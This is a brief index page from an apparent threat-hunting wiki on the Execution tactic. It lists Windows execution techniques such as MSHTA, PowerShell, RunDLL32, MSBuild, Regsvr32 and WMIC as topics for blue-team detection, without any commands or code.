Execution
The adversary is trying to run malicious code
In this category we are aware that we need to Execute our Code, for whatever purpose it can be. Reverse Shell, Enumeration, Privesc, etc. But in this section we are a Hunter (Blue Team) and we are searching for our Prey (Red Team) again, what is left behind, what processes are created so they can reach their goal, what can we find so we know that they were here. This also helps us in to be more Opsec Safe Red Team can learn from here on what they are leaving behind and how can they avoid it in any way.
Will focus in the common techniques explained in the Offensive Section:
    MSHTA
    PowerShell
    RunDLL32
    Scheduled Tasks
    Scripting
    Trusted Developer Utilities
      MSBuild
      Regsvr32
    WinRm
    WMIC
    Etc
​
Last modified 1yr ago
Copy link